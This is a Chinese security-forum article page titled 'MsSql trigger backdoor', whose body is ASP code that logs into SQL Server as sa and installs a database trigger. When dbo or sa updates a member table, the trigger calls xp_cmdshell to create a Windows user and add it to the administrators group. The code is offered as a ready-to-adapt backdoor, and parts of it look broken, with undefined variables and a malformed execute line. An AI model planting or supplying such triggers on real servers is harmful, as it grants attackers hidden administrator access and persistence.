首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>系统安全>文章内容
MsSql 触发器后门
来源:www.vfcocus.net 作者:vfocus 发布时间:2009-08-03  

根据雪山剑神的一篇文章写的 asp代码。他的文章在黑手7、8月合刊。

<%

'里边的变量代码大家用时自己改吧
On Error Resume next
Set conn=Server.CreateObject("ADODB.Connection")
DSN="driver={SQL Server};Server=(Local)\GSQL;database=baby;uid=sa;pwd=lcx;"
conn.Open DSN
if conn.State=1 then
response.write("成功")
sql="CREATE TRIGGER myasp_bkdoor"&Chr(10)&Chr(13)&"ON users_member"&Chr(10)&Chr(13)&"AFTER UPDATE"&Chr(10)&Chr(13)&"AS"&Chr(10)&Chr(13)&"IF user='dbo' OR user='sa'"&Chr(10)&Chr(13)&"BEGIN"&Chr(10)&Chr(13)&"PRINT 'dbo OR sa logon'"&Chr(10)&Chr(13)&"EXEC master..xp_cmdshell'net user test 123456 /add&&net localgroup administrators test /add'"&Chr(10)&Chr(13)&"END"&Chr(10)&Chr(13)&"ELSE"&Chr(10)&Chr(13)&"BEGIN"&Chr(10)&Chr(13)&"PRINT 'not dbo or sa privilage'"&Chr(10)&Chr(13)&"END"&Chr(10)&Chr(13) '建立myasp_bkdoor触发器,触发baby库中的users_member表的update操作加用户
SQL1="update users_member set email=3 where accountid=1" '触发
'sql2="drop TRIGGER myasp_bkdoor"
set rs=conn.execute(SQL)&conn.execute(SQL1,iRowsAffected, &H0001)'&conn.execute(SQL2) '触发
Do Until Rs.EOF
      Response.Write " <tr>" & vbNewLine
      For I = 0 To Rs.Fields.Count - 1
       Response.Write "<td>" & SQLOut(oRs(I)) & "</td>" & vbNewLine
      Next
      Response.Write " </tr>" & vbNewLine
      Rs.MoveNext
     Loop

else
response.write("失败")
end if
%>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·Windows 系统调用功能列表
·windows入侵提权-创建隐藏帐号(
· CC_STACKPROTECTOR防止内核stac
·Linux内核安全研究之Stack Overf
· Exploit The Linux Kernel NULL
·Kernel Locking 中文版
·IA32上Linux内核中断机制分析
·Award BIOS Rootkit,universal
·PHP代码审计
·N种内核注入DLL的思路及实现
·glibc 2.3.5 的一些新安全特性
·Struts2/XWork < 2.2.0 Remote C
  相关文章
·批量挂马和批量清马程序
·Linux文件权限隐藏的细节深入分
·Linux Hardening & Security
·资深Linux系统管理员网络安全经
·终结Webshell 加固web服务器
·构建免受Fso威胁Windows虚拟主机
·Rootkit技术的主要原理
·系统安全防护之UNIX下入侵检测方
·熟悉Linux系统的安全和优化
·Linux Hardening & Security (cP
·最简单的破解Windows忘记密码的
·windows入侵提权-创建隐藏帐号(
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved